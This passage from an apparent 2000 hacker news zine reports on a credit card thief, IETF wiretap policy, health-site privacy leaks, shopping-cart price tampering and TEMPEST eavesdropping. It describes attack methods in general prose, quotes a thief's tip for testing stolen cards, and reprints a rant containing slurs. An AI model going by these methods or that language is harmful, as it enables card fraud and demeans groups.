said. "We were actually alerted by a visitor. I went there, actually saw it, and it was removed in a couple of minutes." He declined to say who registered the Web site. Adam Sohn, a Microsoft spokesman, called the story about alleged posting of Gates' credit card number "dubious and fraught with errors." "It's unfortunate that folks are doing this kind of thing. It's irresponsible and criminal," said Sohn. Claims to have 5,000 more Curador claims to have at least 5,000 credit card numbers that he got while hacking into an online mall based in Thailand. "I Intend to Post another 1,000 Cards in the Next 48 Hours the Rest, I will keep in my collection, what you have to remember is that although I only have 5,000 numbers, I can extrapolate a few valid card numbers from each of those 5,000 Cards," Curador said in an e-mail. Curador denied any financial motive. "My main motive was boredom, pure and simple so I did this little crack, E-Commerce sites beware because I am Posting from more sites soon," Curador warned. Curador's message Information about the alleged hacking incident was posted to one of the hacking-related mailing lists. Part of the message reads: "The Site Is A List Of Stolen CC Numbers Over a Thousand, Read more there. I hope you like my work? If ya want Interviews E-mail me the Questions.)...byebye" "I did not demand money from the e-commerce site, who are blissfully unaware that I have put these numbers on-line," Curador said. "In the Next 48, Hours, I Will Post a Link to their site, Plus (maybe) the Names & Address of the People who's Numbers I Post, But only if I can be bothered. You can check if these are real the same way I did go visit any porno site, and enter the card numbers you will be approved and that is the only proof I can offer." 'Not a great feat of magic' One computer security expert, who did not want to be named, called this latest incident the equivalent of "Dumpster diving," referring to a practice by some teenagers who go into trash bins in the back of buildings to get carbon copies of credit cards. "You don't have to have a Ph.D. in computer science to do this. You have to know how to turn a computer on and that's about it. This is not great feat of magic for these kids," he said. From examining the header information on the e-mail message, the security expert believes the sender is in the Colorado Springs, Colo., area. Curador, however, insists he is in Europe. The security expert said the so-called e-commerce hacking incidents do not take any great computer skills. 'Not breaking into anything' "They are not breaking into anything," he said. "What they are doing is going to the Web site, using the CGI's [common gateway interface] and they're making the CGIs dump out credit card databases and they're using Microsoft's SQL Server [standard query language]. They are connecting to an SQL port and downloading databases." The security expert said many e-commerce sites sacrifice security in favor of ease of access and purchase. "An e-commerce site cannot be secure and convenient, and if it's not real convenient, people aren't going to use it. The problem is that companies that have e-commerce are trying to rake in all this money, but they seriously lack security, and they know it. They don't want to implement it because it may require a few more clicks or it is a little more complicated," he noted. He suspects that the people responsible for this latest action also perpetrated the CD Universe intrusion, though a Russian hacker named "Maxus" claimed responsibility. The security expert said he believes "Maxus" is really a group of teens in Colorado Springs. 'General lack of security' Space Rogue, editor of the Hacker News Network and a research scientist at the newly formed e-commerce security company @Stake, said the hacking claim might be true. "I have no reason to doubt it took place. Considering the general lack of security on e-commerce sites as evidenced by all the recent blunders [such as] CD Universe, Outpost.com, Northwest Airlines. It doesn't really surprise me," said Space Rogue. He said that posting the credit card numbers and not citing the vandalized e-commerce site is wrong. "As for actually posting the numbers to the Net, that's something I don't agree with," Space Rogue said. "The fact that the company in question was not mentioned nor the details of the hole is completely irresponsible." The credit card posting follows the highly publicized hacking into the database of music e-retailer CD Universe. "Maxus" claimed to have stolen information on 300,000 credit cards. Maxus began posting numbers online after the company refused to pay him $100,000. David Noack is an APBnews.com staff writer (david.noack@apbnews.com). @HWA 94.0 HNN: Feb 3rd: IETF Says No To Inet Wiretaps ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench The Internet Engineering Task Force has issued a resounding no to Internet wiretaps. They said that they would not "consider requirements for wiretapping" in protocols. IETF Draft Proposal http://www.ietf.org/internet-drafts/draft-ietf-iab-raven-00.txt Wired http://www.wired.com/news/politics/0,1283,34055,00.html Thumbs Down on Net Wiretaps by Declan McCullagh 3:00 a.m. 3.Feb.2000 PST WASHINGTON -- It took four months, a grim debate, and thousands of mailing list messages, but the group that sets Internet standards has decided not to support wiretapping. The executive committees of the Internet Engineering Task Force dismissed the idea with characteristic understatement, saying they would not "consider requirements for wiretapping" in protocols. The 15 KB draft document released this week caps an unusually public debate inside IETF that was marked by an FBI call to permit wiretaps, Congressional condemnation of the idea, and a flame-ridden mailing list called "raven" that lived up to its homophonous name. But in the end, most members of the loose-knit group that met here in November opposed the idea, and the draft written by the Internet Architecture Board and the Internet Engineering Steering Group is the result. There's some precedent for the IETF refusing to bow to direct or indirect government pressure to build surveillance into the Internet. In a now-famous draft called RFC 1984, the group denounced easily breakable encryption and endorsed secure communications. Under the organization's procedures, this week's draft statement is not yet final and members can offer changes. But a member of the drafting group said he anticipates no serious alterations. "The only thing I expect is wording changes," says Jeff Schiller, an MIT network manager and IESG member. "I think the community has pretty much told us what they want to see here. I would not expect the community to do a 180-degree about-face." Yet even wording can be divisive. It didn't take long for raven list members to complain that the IETF's definition of "wiretap" would allow future protocols to support broad surveillance -- as long as the interception wasn't targeted at specific people. "This is outrageous," wrote Ed Stone. "A third party taps a communication in secret, but the selection is NOT targeted to a SPECIFIC person, so it is not 'wiretapping.' This is simply incredible!" IETF chairman Fred Baker did his best to mollify the critics, and -- for once -- there seemed to be only a few. "Maybe you can offer some better text," Baker replied. "What we were trying to say was that when one puts a sniffer on an Ethernet for network management purposes for a purpose unrelated to capturing a user's content [such as trying to collect usage statistics] this was not wiretapping." Administrators regularly monitor Internet traffic flow to determine things like what percentage of traffic is devoted to the Web compared to email, and tools like MCI's vBNS make it easy. (One 1998 paper calculated that roughly 70 percent of traffic at one node was Web usage.) If there's no serious opposition, the draft will become an Internet standard. @HWA 95.0 HNN: Feb 3rd: Medical Web Sites Leak Privacy Info ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench Despite promises to the contrary Medical and Health related web sites are giving out the personal information of their visitors to marketers without notifying them, sometimes in direct violation of their own privacy policy. The privacy breaches were discovered after a survey of 21 of the web sites was conducted by the California HealthCare Foundation. ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2431429,00.html?chkpt=zdnntop NY Times http://www.nytimes.com/library/tech/00/02/cyber/articles/02privacy.html C|Net http://news.cnet.com/news/0-1007-200-1539309.html?tag=st.ne.1002.bgif.1007-200-1539309 NYTimes; February 2, 2000 Health Sites Violate Their Own Privacy Standards, Study Finds By JERI CLAUSING ASHINGTON -- Internet health sites collect some of the most personal information about their users, but few follow their own declared policies about maintaining the privacy of that data, according to a survey made public Tuesday. The study, by the California HealthCare Foundation, found that 19 of the top 21 health sites had privacy policies, but that most failed to follow their stated practices. And none of the sites followed fair information practices as defined by the Federal Trade Commission. The survey comes as policy makers are more closely scrutinizing the privacy practices of Web sites to determine whether new laws are needed to regulate online marketers. Privacy advocates said the study proved that the Internet industry has failed in its attempts to police itself in the area of online privacy. "This is about the 7,000th piece of conclusive evidence that self-regulation is not working," said Jason Catlett, founder of Junkbusters Corp., a company that helps people and companies protect their privacy online. The study's author's, however, were less judgmental, comparing the online health industry to an awkward adolescent who has yet to understand all the implications of his actions. Richard M. Smith, an Internet security analyst, and Janlori Goldman, director of the project, said Internet health sites are well aware that consumers expect the information they supply to be confidential. They said they believe many of the sites are unaware that third-party advertisers and service providers have access to the personal information they are collecting. The technological mechanisms behind the privacy violations, Smith said, include the use of "cookies," which track Web surfers' movements online, and banner ads, which in some cases can pick up the information entered by visitors on the pages where they are displayed. The combination can enable advertising companies like DoubleClick to build detailed profiles of consumers and of the information they seek online. For example, Smith said, some companies that place banner ads would be able to pick up an e-mail address entered by someone visiting a Web page about AIDS, even if the visitor never clicked on that ad. The address could then be matched with the Web "footprints" left on that computer by implanted cookies. Many consumers and even Web site operators are unaware that advertisers have such technical capabilities, which allow them to build huge databases of consumer behavior, Smith said. "It's complicated," Smith said. Some of the privacy violations "are accidental, and some are on purpose. Some (sites) really don't know that DoubleClick is collecting addresses," he said. Catlett, a technical expert who previously worked for the data mining division of AT&T, said he thinks it is very plausible that many Web sites are unknowingly violating their own privacy policies. "A lot of these sites are being set up in great haste, and often without sufficient knowledge or attention to the leakage that takes place with online advertising," he said. Still, Catlett said, "It's horrifying but not surprising that medical sites are doing as poor a job on privacy as used car trading sites." "I think probably medical sites are not doing any worse of a job on privacy as other e-commerce sites, but the public's expectations and need for privacy in a medical site is so much greater that the truly horrendous prevailing levels of privacy on the Web are just ludicrous," he said. Although privacy advocates for years have been calling on Congress to pass a law setting rules for Internet sites to follow when collecting personal information, the Clinton administration and the Federal Trade Commission have sided with the Internet industry, which says it needs a chance to prove that marketers and online merchants can police themselves. FTC officials on Tuesday had no comment on the study. This spring the commission is expected to issue its third annual report to Congress on the state of online privacy and whether it thinks new laws are needed. The study's authors declined to get into the political debate over whether new laws are needed, saying they conducted the survey in hopes of providing the industry with the information it needs to better meet customers' online privacy expectations. "The goal of the California HealthCare Foundation is to be a broker in this rapidly changing arena," said Mark D. Smith, president of the group, which presented its study during a summit on online health ethics. @HWA 96.0 HNN: Feb 4th: 27 Months for Piracy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by mortel A British citizen has been sentenced in U.S. District Court in San Jose to 27 months in prison for selling pirated copies of popular computer programs, such as Microsoft Excel, Lotus 123 and Auto Desk AutoCAD. He was originally indicted by a federal grand jury in April 1996. (It took almost four years to come to trail? No wonder the guy pleaded guilty.) Yahoo News http://dailynews.yahoo.com/h/kpix/20000203/lo/20000203112.html Thursday February 03 11:41 PM EST San Jose Sentencing For Sale of Pirated Programs A British citizen has been sentenced in U.S. District Court in San Jose to 27 months in prison for selling pirated copies of popular computer programs. Lawrence Warmate, 40, was sentenced by Judge Ronald M. Whyte on Jan. 31. Warmate pleaded guilty to reproducing and selling computer software such as Microsoft Excel, Lotus 123 and Auto Desk AutoCAD. The pirated software was valued at between $350,000 and $500,000 by the court. Warmate was originally indicted by a federal grand jury in April 1996. J.Bennert827p2/3/00 -=- (...40 yrs old? don't assume that all 'warez kiddiez and 'script/packet kiddiez' really are kids... this is an excellent case in point. You don't really know who's out there, one major warez group has an average age of 34 in its members, one as young as 12 another as old as 50 ... - Ed ) @HWA 97.0 Have you been looking for www.hack.co.za? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ By; Cruciphux You can find it here, temporarily. Its posted all over the zine but just so you all can find it, I stuck the info in its own section. http://www.siliconinc.net/hack/index.html It does NOT appear to be getting updated, and seems to be a portion of the site only. Unknown if the '0-day' special private contributions / download section is active or not on this mirror. I haven't been able to get in touch with gov-boi, I don't have his email and i've been missing him on IRC, but when I get a hold of him i'll get an update on the site, the investigation into the DoS attacks and forward mail i've received for him. Thanks to all for the support. @HWA 98.0 HNN: Feb 4th; Security Holes Allow Prices to be Changed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by turtlex Shopping cart software is vulnerable to users changing the price of goods. By altering a page locally or twiddling with a URL customers are sometimes able to purchase goods online for whatever price the choose. The UK Register http://www.theregister.co.uk/000203-000006.html Posted 03/02/2000 11:59am by John Lettice Online store security holes let hackers buy at cut price A security hole in some web-based shopping cart systems allows shoppers to edit the data and buy items at reduced prices, according to an ISS (Internet Security Systems) X-Force security alert issued this week. According to X-Force, 11 shopping cart applications used by e-commerce sites are vulnerable to this kind of malicious tampering. Some shopping cart applications use hidden fields in HTML forms to hold parameters for goods in an online store, and this is one potential security hole. If the attacker changes the price in the form on a local machine then loads the page into the browser, the item can be added to the cart at the modified price. If hidden discount fields are used it's also possible to modify these and get discounts on items without modifying the price in the form. From the vendors point of view this gets really nasty if credit card orders are processed in real time, and it's difficult to verify that the correct price is being used before the credit card is charged. X-Force also says that price changing is possible where an item's price is listed in a URL. "When clicking a link, the CGI program will add the item to the shopping cart with the price set in the URL. Simply changing the price in the URL will add the item to the shopping cart at the modified price. Shopping cart software should not rely on the web browser to set the price of an item." Most of the sites affected have begun modifying their software to plug the holes, says X-Force. ® @HWA 99.0 ThE,h4x0r.Br0z toss us a dis ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This is kinda old and dated now, thing is see, I forgot about it, anyways here's the infamous hax0r brothers with some shiznitz and dizzing on our groove thang..taken from issue #11 http://the.wiretapped.net/security/textfiles/ThE.h4x0r.Br0z/haxo11.txt <snip> ÚÄÄÄÄÄÄÄÄÄÄÄÄ[ BiaTcH NeWz SiTeZ ShiZUm ]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> ÀÄÄ> Hax0rWang oK FuCkiN SHIT iTz AbouT tiME thAT I cOmE ouT anD spEAk ON THIZ!@# TheRE aRE waY t0 mAnY fuCkIN NEws WeBSiteZ anD sHIzniTcH aND ZiNE THiNGS baSeD oN HaCkuZ aND hAcKiNG thAT hAvEn'T doNE shiT aS fAr aS RePorTiNG abOUT uS.. s0 iTz TiME we LaY thE sMACk d0wN!@# FirST thiNGyZ FIrzsST.. HaCkeRneWS.Com... OkAy HeLLo? H0w CaN iT bE haXOr nEWz iF iT doEsNT taLK abOUT uS j00 fuCkiN BITcHnuTz!@ AnD thAT GaY asS hWa.hAxoR.nEwZ... SurE tHAts RiGHt.. TypE j0r FuCKinG NamE haxOR br0Z sTyLE anD donT giVe uS CreDit? JeW wILL pAy U fuCKinG FuCKz!@# ThiS iS thE haXoR br0thErZ CaLLinG aLL WaNNa BE HaXor bR0theRZ!# If j00 HaxoR eiTHeR haCkeRnEwS.CoM oR welcome.to/HWA.hax0r.news ThEN wE wILL GiVE j00 A fREe AuToGraPHeD pIcTurE oF uS.. wE oF COurSe WouLD haXOr iT ouRsElVeZ buT wE aRE pRepaRiNG foR ouR wOrlD TouR in 99!@#!@ hELL jEaH ouR moMZ aRe GOnNa LeT uS StaY uP tiLL liKE 9 anD shiT FoR thiS TOuR!@#!@# FuXoRiNG a!@# n0w iF j0r TeW LaYMEzoR tEw HaXOr TheIR PaGeZ THen j00 CaN do THiZ! SenD thEM aN eMaIL TelLinG thEM hoW lAyME thEY aRe anD ThaT THeY WilL alWaYz bE GaY bEcaUSe HAxor bROtheRZ owN thEM aND thEY Can'T bE haXor SItEz WiTH ouT ouR seAL oF fuCKin AppRoVaL whICh THeY deW nOT haVE!@# cC uZ a CopY iF j00 do THaT!@# AnD oN a FinaL n0tE... DeEz niGgaZ THiNK TheY caN TrY t00 RiP oUR LeeTneZZ.. ThEY EvEN CLaIM to BE thE lEEtESt.. s0 iF aNY oF j00 WaNNa sEE whAT HaxOR br0Z WaNNaBEeZ LooK liKE thEN CHeX0R ouT nEAtoELiTo.oRg.. BitChAz WaNNa bE fLY liKE uZ buT wE aRE juST t00 sCHaWeET!@# YeaH theEY aREn'T a nEwZ sITe BuT thEY sTiLL b0w t0 uZ anD TheY beTTa ReCoGNiZE!@# <snip> ( We don't touch you coz we ph33r! - Ed ) @HWA 100.0 HNN: Feb 4th: Carders Congregate in IRC ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by sean The illegal exchange of credit card numbers is big business and it happens in IRC chat rooms, where law enforcement seldom goes. The consumer is only limited to a $50 liability and the huge CC company passes fraudulent charges back to the small time vendors so who has the motivation to stop it? MSNBC http://www.msnbc.com/news/365426.asp?cp1=1 101.0 HNN: Feb 4th; Tempest Tutorial and Bug Scanning 101 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by James An excellent tutorial on the eavesdropping technology known as tempest has been posted. It covers the history as well as the theory behind this potentially frightening technology. Tempest Tutorial http://www.tscm.com/TSCM101tempest.html On the Same Site we also found an excellent article covering commonly used listening device frequencies. It covers everything from 15.7kHz to the 2.4 GHz band. (Only for the truly paranoid.) Bug Scanning 101 http://www.tscm.com/TSCM101bugfreq.html (Mainly a freq list, no big whoop, go check it out if you're interested, i've printed the Tempest article below - Ed) (This site isn't new to me, there is a LOT of information on intrusion countermeasures and bug detection on the net, tscm provides some of the best. - Ed ) Tempest: Introduction When a new consumer electronic device such as a computer, DVD player, blender, electric razor or other modern electronic marvel is offered for sale to the public the manufacture has to gain a special certification or authorization from the FCC. This process ensures that when the consumer uses the device that they will not interfere with other sdevices in the area. For example we don't want a DVD player or blender to accidentally jam all the TV, and cellular telephones in a five-block area due to a poor product design. The FCC (Federal Communications Commission) and its foreign equivalent has created a series of formal standards which new equipment is evaluated against before it is offered to the public. These new products are taken into a specialized laboratory, and an engineer completes a complicated battery of tests. These test results are then sent to the FCC who then approves or denies the authorization. When modern electrical devices operate they generate electromagnetic fields. Digital computers, radio equipment, typewriters, and so on generate massive amounts of electromagnetic signals which if properly intercepted and processed will allow certain amounts of information to be reconstructed based on these "compromising emanations". Basically anything with a microchip, diode, or transistor, gives off these fields. Compromising emanations are these unintentional intelligence-bearing signals, which, if intercepted and analyzed, potentially disclose the national security information, transmitted, received, handled, or otherwise processed by any information-processing equipment. These compromising emanation signals can then escape out of a controlled area by power line conduction, other fortuitous conduction paths such as the air conditioning duct work, or by simply radiating a signal into the air (like a radio station). An excellent example of these compromising emanations may be found in modems and fax machines which utilize the Rockwell DataPump modem chip sets and several modems made by U.S. Robotics. When these modems operate they generate a very strong electromagnetic field which may be intercepted, demodulated, and monitored with most VHF radios. This is also a very serious problem with many speaker phone systems used in executive conference rooms. This is also a very serious problem with many fax machines, computer monitors, external disc drives, CD-R drives, scanners, printers, and other high bandwidth or high speed peripherals. If an eavesdropper is using high quality intercept equipment the signal may be easily acquired several hundred feet or more away from the target. In the consumer markets a slight amount of signal leakage really does not present a problem, however; if a computer processing classified information has a leak the results could be devastating. To deal with this "signal leakage" issue the government developed a series of standards which lay out how equipment should be designed to avoid such leakage. The TEMPEST standard are really nothing more then several industry measurements standards which were adjusted by the NSA (they gave it steroids). Really the only difference between a TEMPEST approved computer, and a consumer computer is that the NSA TEMPEST approved one will be in a special heavy metal case, will have special shielding, a modified power supply and a few other modifications which increase the price by at least 40 times. About TEMPEST TEMPEST is an official acronym for "Telecommunications Electronics Material Protected From Emanating Spurious Transmissions" and includes technical security countermeasures; standards, and instrumentation, which prevent (or minimize) the exploitation of security vulnerabilities by technical means. TEMPEST is nothing more then a fancy name for protecting against technical surveillance or eavesdropping of UNMODIFIED equipment (the unmodified part is important). Other popular, but unofficial names for TEMPEST are "Transient Emanations Protected From Emanating Spurious Transmissions", "Transient Electromagnetic Pulse Emanation Standard", "Telecommunications Emission Security Standards", and several similar variations (including: "Tiny ElectroMagnetic Pests Emanating Secret Things"). TEMPEST was "invented" in 1918 when Herbert Yardley and his staff of the Black Chamber were engaged by the U.S. Army to develop methods to detect, intercept, and exploit covert radio transmitters. The initial research identified that "normal unmodified equipment" was allowing classified information to be passed to the enemy through a variety of technical weaknesses. A classified program was then created to develop methods to suppress these "compromising emanations". However, the actual acronym known as TEMPEST was only coined in the late 60's and early 70's (and is now considered an obsolete term, which has since, been replaced by the phrase "Emissions Security" or EMSEC). TEMPEST products exist, however; they are highly restricted and controlled SIGINT/COMINT (Signals or Communications Intelligence) products and are CIA/NSA grade surveillance goodies. Such products are only available from a very small number of defense or intelligence contractors, and only to those with really serious security clearances. TEMPEST products are not sold at Radio Shack, by private investigators, at spy shops in New York City, or by security "experts". TEMPEST and it's associated disciplines involve designing circuits to minimize the amount of "compromising emanations" and to apply appropriate shielding, grounding, and bonding. These disciplines also include methods of radiation screening, alarms, isolation circuits/devices, and similar areas of equipment engineering. TEMPEST disciplines typically involve eliminating or reducing the transients caused by a communication signal and the resulting harmonics. These signals and their harmonics could allow the original signal to be reconstructed and analyzed. TEMPEST Approved Devices A TEMPEST approved device (see below) is one that meets stringent technical requirements. The electromagnetic waves it emits have been reduced through shielding or other techniques to a point where it would be extremely difficult for a hostile intelligence agent to gather information from the electromagnetic waves and disclose the classified information being transmitted. TEMPEST Approval - Type 1: A classified or controlled cryptographic equipment, assembly, component, or item endorsed by the National Security Agency (NSA) for securing telecommunications and automated information systems for the protection of classified or sensitive U.S. Government information exempted by the Warner Amendment for use by the U.S. Government and its contractors, and subject to restrictions in accordance with the International Traffic in Arms Regulation. TEMPEST Approval - Type 2: An unclassified cryptographic equipment, assembly, component, or item endorsed by the National Security Agency for use in telecommunications and automated information systems for the protection of unclassified but sensitive information. Type 2 equipment is exempted by the Warner Amendment. Type 2 is available to U.S. Government departments, agencies, sponsored elements of state and local government, sponsored U.S. Government contractors, and sponsored private sector entities. It is subject to restrictions in accordance with the International Traffic in Arms Regulation. TEMPEST Approval - Type 3: An unclassified cryptographic equipment, assembly, component, or item that implements an unclassified algorithm registered with the National Institute of Standards and Technology (NIST) as a FIPS for use in protecting unclassified sensitive, or commercial, information. This definition does not include Warner-Amendment-exempt equipment. Test Equipment for a TEMPEST in a TEAPOT While SIGINT deals with the interception and analysis of "compromising emanations", TEMPEST is the protection of those "emanations". TEMPEST, TEAPOT (as in "TEMPEST in a TEAPOT"), NONSTOP, SKIPJACK, HIJACK, and TSCM are all related standards and protocols which deal with containing "compromising emanations". TEMPEST generally deals specifically with shielding, bonding, and grounding (it is a counter-surveillance science, and has nothing to do with actual surveillance or reading or reconstructing these emanations). TEAPOT refers to the investigation, study, and control of intentional compromising emanations such as those hostilely induced or provoked from telecommunications and computer equipment. TSCM includes all countermeasures employed to prevent or detect the interception of sensitive, classified, or private information. TSCM is typically an inspection by a technician or engineer of a physical item or place (briefcase, automobile, office, home, boat, etc...). The purpose is to locate possible covert surveillance devices (bugs), technical security weakness, and technical security hazards. TEMPEST test equipment is very expensive, and is very highly controlled military products (usually classified). While a number of U.S. companies offer such equipment they will only sell it to government agencies. Beware of anybody who tries to foist a security product onto you and claims it involves TEMPEST technology. Such equipment utilizes both extremely narrow bandwidths (often 100 Hz or less), and very wide bandwidths (above 50 MHz). This kind of equipment also must use super stable time bases, which are very expensive. Even the most basic models of this kind of equipment cost hundreds of thousands of dollars. Of course such equipment is quite inappropriate for eavesdropping (there is no such thing as a "TEMPEST Eavesdropping System"). Van Ecking In 1985 Wim van Eck (an engineer in the Netherlands) published a white paper entitled "Electromagnetic Radiation from Video Display Units: An Eavesdropping Risk?" which discussed potential methods which could be used for eavesdropping on video monitors. The "van Eck receiver" was based on older video monitors which utilized a composite video signal with little or no RF/EMI shielding. These video signals were typical broadcast base-band video signals, and the monitors were generally un-shielded which radiated tremendous amounts of RF energy. Very often when these types of monitors were placed near a television set the video monitor would interfere with the television and the "computer stuff" would appear and interfere with the Dallas and Charlies Angels re-runs. Since these monitors utilized the same timing signals and waveform parameters as commercial video signals the display of the signals was very easy and required only a few dollars on components to stabilize the signal. RAID or Raster Analysis Effectively what van Eck did was to point out a well-known hardware security vulnerability that existed in composite computer monitors. His paper covered methods that could be used to exploit this vulnerability, and brought "emission analysis" to public attention when it was published. Of course every "lid, kid, con-artist, crank, and crackpot" came forward and anointed him or herself an expert on van Eck and TEMPEST technology. What Wim van Eck presented is actually called RAID or "Raster Analysis" which is the reconstruction of high bandwidth composite signals which are based on a repeating synchronization signal (such as Radar, Video, and so on). A brief tutorial on raster or video signal analysis may be found at the following link http://www.tscm.com/TSCM101video3.html Lids, Kids, Con-Artists, Cranks, and Crackpots It should be mentioned that the only place in the United States that a person can learn anything about TEMPEST is a special school taught and sanctioned by the National Security Agency. Once a technician or engineer completes the appropriate training the NSA will actually certify them as a "TEMPEST Technician" or "TEMPEST Engineer" and they will then be authorized the work on or design TEMPEST approved equipment. The (very expensive) courses are only offered to a limited number of people who have a very high level of security clearance, and who will be working with such equipment on a regular basis. While van Eck's engineering and white paper was quite legitimate a number of con-artists capitalized on the paper to sell special screening boxes, "van Eck receivers", and special "Classified CIA intercept systems". These products are generally considered a rather old hoax, but the con artists are still racking in hundreds of thousands of dollars selling bogus toys. Such a system only requires about $15 to construct a special amplifier or timing circuit. The method is a "no-brainer" which any college freshman could do Intercepting a composite video signal from an older unshielded monitor is actually quite simple, HOWEVER; the modern computer monitors sold today rarely use a composite video signal. Also, due to the serious shielding and emission standards required by the FCC the presence or interception of such signals is virtually nil (even at close distances). Keep Your Wallet in Your Pocket Many people, including the members of the media, have been swallowing what is falsely claimed to be TEMPEST simply because they neither understand the science nor will they do even simple research or inquiries on a vendor who claims to be a TEMPEST expert. The majority of TEMPEST surveillance "demonstrations" are actually rigged or grossly misrepresented (the spy might as well become a psychic and start channeling Ramtha via his big toenail). In the past few years there have been quite a few "TEMPEST experts" that demonstrate what they claim will intercept "TEMPEST signals". Most of the Tempest/Van Eck surveillance products out there are nothing more then a scam run by thieves, con men, scam artists, liars, thieves, snake oil salesman, felons, and mental patients (no kidding). Seriously, if such a person attempts to peddle would-be TEMPEST products on you, ask about their current probation status, prior criminal convictions, and ask about the last time they talked with a psychiatrist or other mental health professional (and then watch them run out the door). Several firms have even gone so far as to pre-record the display of a computer monitor (with a video camcorder no less) and then conceal a playback VCR in a fancy looking demonstration box. The victim pays the "TEMPEST expert" $20,000 for an identical box and never sees there money again, nor do they ever get a magical TEMPEST box. After several months the victim tries to contact the con artist only to find the phone number given goes to a beeper (the owner of which refuses to re-contact the victim). The Law Keep in mind that if somebody offers you any type of van Eck "intercept" or TEMPEST surveillance system that they are committing a serious federal felony. In the event that you are gullible enough to actually pay the con artist then YOU have committed a serious federal felony. Also, if you attempt in any way to obtain the equipment, or engage in any kind of activity to help someone else obtain the equipment that is also illegal (even if it's a hoax). You will leave eavesdropping and interception equipment alone unless you have a strong desire to have extended discussions with the nice agents from the FBI. They would be quite happy to talk to you regarding your upcoming indictment and your "all expenses paid vacation at a federally operated vacation resort". Remember that ANY possession, attempted sale, attempted purchase, or building of such a surveillance product or device is highly illegal unless you are under a very specific government contract (even if it is a hoax). The building, possession, sale, or advertising of any device designed or developed to exploit signal leakage or compromising emanations is a very serious criminal act in the United States unless you are under a very specific government contract (or are a police officer with a legitimate court order). Also, any device, or system which is primarily useful for the interception of communications is also illegal, and the justice system takes a very dim view of people who try to skirt the law by playing cute word games. References Here are a few of the more common government specifications (out of about 400) concerning TEMPEST and it's associated disciplines: (U) NSA-82-89, NACSIM 5000, TEMPEST Fundamentals, National Security Agency, February 1, 1982 (C) (U) NACSIM 5004, Tempest Countermeasures for Facilities Within the United States, National COMSEC Instruction, January 1984 (S) (U) NACSIM 5005, Tempest Countermeasures for Facilities Outside the United States, National COMSEC Instruction, NACSIM 5005, January 1985 (S) (U) NACSIM 5009, Technical Rational: Basis for Electromagnetic Compromising Emanations Limits (C) (U) NACSIM 5100A Compromising Emanations Laboratory Test Requirements, Electromagnetics. National Security Telecommunications and Information System Security (NSTISS) (U) NACSIM 5108, Receiver and Amplifier Characteristics Measurement Procedures (FOUO) (U) NACSIM 5109, TEMPEST Testing Fundamentals, March 1973 (U) NACSIM 5112, NONSTOP Evaluation Techniques (U) NACSIM 5201, TEMPEST Guidelines for Equipment System Design, September 1978 (U) NSA 82-90, NACSIM 5203, Guidelines for Facility Design and RED/BLACK Installation, National Security Agency, June 30, 1982 (C) (U) NSA 65-5, NACSIM 5204, RF Shielded Acoustical Enclosures for Communications Equipment: General Specification, National Security Agency, October 30, 1964 and May 1978 (C) (U) NSA 65-6, NACSIM 5204, R.F. Shielded Enclosures for Communications Equipment: General Specification, National Security Agency, October 30, 1964 (U) NSA 73-2A, NACSIM 5204, National Security Agency Specification for Foil RF Shielded Enclosure, National Security Agency NSA 89-01 (Draft), NACSIM 5204, National Security Agency Specification for a High Performance Shielded Enclosure, National Security Agency, May 31, 1989 (U) NCSC 3, TEMPEST Glossary (S) (U) NTISSI 4002, Classification Guide for COMSEC Information (S) NTISSI 7000, National Telecommunications and Information Systems Security Instruction, TEMPEST Countermeasures for Facilities, October 7, 1988 NTISSP 300, National Telecommunications and Information Systems Security Policy, National Policy on the Control of Compromising Emanations, October 3, 1988 NSTISSAM TEMPEST 1-92, Compromising Emanations Laboratory Test Requirements, Electromagnetics. National Security Telecommunications and Information System Security (NSTISS), December 15, 1992 NSTISSAM TEMPEST 1-93, Compromising Emanations Field Test Requirements Electromagnetics, August 30, 1993 (U) (U) NSTISSAM TEMPEST 2-91, Compromising Emanations Analysis Handbook, National Security Telecommunications and Information Systems Security Advisory Memorandum (C) NSTISSAM TEMPEST 2-92, Procedures for TEMPEST Zoning, December 30, 1992 (U) NSTISSAM TEMPEST 2-95, RED/BLACK Installation Guidance, National Security Telecommunications and Information Systems Security Advisory Memorandum, December 12, 1995 (C) NSTISSAM TEMPEST 3-91, Maintenance and Disposition of TEMPEST Equipment, December 20, 1991 INFOSEC System Security Products & Services Catalog, October 1990, National Security Agency DOD Directive C-5000.19, Control of Compromising Emanations (U), February 23, 1990 MIL-STD-461E, Department of Defense Interface Standard, Requirements For The Control of Electromagnetic Interference Characteristics of Subsystems And Equipment (Replaces previous 461 and 462), 20 August 1999 MIL-STD-IB8-124B, Military Standard Grounding, Bonding and Shielding for Common Long Haul/Tactical Communication Systems including Ground Based Communications-Electronics Facilities and Equipment, February 1, 1992 MIL-HDBK-232, Red/Black Engineering - Installation Guidelines MIL-HDBK-411A, Long Haul Communications (DCS), Power and Environmental Control for Physical Plant MIL-HDBK-419, Grounding, Bonding, and Shielding for Electronic Equipment and Facilities MIL-HDBK-1195, Radio Frequency Shielded Enclosures, September 30, 1988 MIL-STD-188-124, Grounding, Bonding, and Shielding for Common Long Haul and Tactical Communications Systems MIL-STD-285, Method of Attenuation Measurement for Enclosures, Electromagnetic Shielding for Electronic Test Purposes. James M. Atkinson Granite Island Group President and Sr. Engineer http://www.tscm.com/ jmatk@tscm.com About the Author James M. Atkinson is one of a small number of people who have been formally certified and trained by the NSA as a TEMPEST Engineer, and Cryptographic Technician. He has extensive experience with the design and development of SIGINT systems to exploit and/or control compromising emanations. Additionally, he has many hours of experience working deep inside highly classified U.S. and NATO cryptographic, communications, and computer systems. "If it doesn't involve a torque wrench, then it's not TEMPEST..." 